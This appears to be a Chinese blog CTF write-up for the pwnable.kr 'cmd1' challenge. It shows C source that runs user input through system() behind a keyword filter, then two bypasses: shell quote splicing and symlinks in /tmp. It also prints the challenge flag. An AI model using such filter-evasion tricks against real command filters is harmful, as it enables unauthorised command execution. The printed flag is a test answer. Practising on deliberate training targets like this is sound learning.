kow

kow's blog

Welcome to kow's blog

Hack 4 fun

cmd pwnable.kr shell拼接

pwnable.kr-cmd1

题目描述:

Mommy! what is PATH environment in Linux?

ssh [email protected] -p2222 (pw:guest)

cmd1.c的源码为:

#include <stdio.h>
#include <string.h>

int filter(char* cmd){
 int r=0;
 r += strstr(cmd, "flag")!=0;
 r += strstr(cmd, "sh")!=0;
 r += strstr(cmd, "tmp")!=0;
 return r;
}
int main(int argc, char* argv[], char** envp){
 putenv("PATH=/fuckyouverymuch");
 if(filter(argv[1])) return 0;
 system( argv[1] );
 return 0;
}

看起来过滤了flag,sh,tmp,没有关系,通过shell下面指令拼接可以绕过:

“/bin/cat ‘fl”ag’”

cmd1@ubuntu:~$ ./cmd1 “/bin/cat ‘fl”ag’”

mommy now I get what PATH environment is for 🙂

所以最终的flag为:

mommy now I get what PATH environment is for 🙂

 

这里更新一种方法:

cmd1@ubuntu:~$ ls

cmd1 cmd1.c flag

cmd1@ubuntu:~$ mkdir /tmp/cmd1

cmd1@ubuntu:~$ cd /tmp/cmd1

cmd1@ubuntu:/tmp/cmd1$ ln -s /home/cmd1/cmd1 cmd1

cmd1@ubuntu:/tmp/cmd1$ ls

cmd1

cmd1@ubuntu:/tmp/cmd1$ ln -s /home/cmd1/flag f

cmd1@ubuntu:/tmp/cmd1$ ./cmd1 “/bin/cat f”

mommy now I get what PATH environment is for 🙂

在/tmp下新建ln,这里就可以绕过对flag的过滤

最近的文章

pwnable.kr-cmd2

题目描述: Daddy bought me a system command shell. but he put some filters to prevent me from playing with it without his permission… but I wanna play anytime I want! ssh [email protected] -p2222 (pw:flag of cmd1)这题ssh的登陆密码是cmd1的flag,登陆后查看cmd2.c的源代码:...…

bash bypass cmd echo payload pwn pwnable.kr继续阅读
更早的文章

pwnable.kr-lotto

题目描述: Mommy! I made a lotto program for my homework. do you want to play? ssh [email protected] -p2222 (pw:guest)看下源码,是个简易的lotto系统,输入6个字符,与系统/dev/urandom生成的6个字符进行比较,如果相同的话就中奖了,但是在检查的地方代码出现了问题:int match = 0, j = 0; for(i=0; i<6; i++){ for(j=0...…

lotto pwnable.kr继续阅读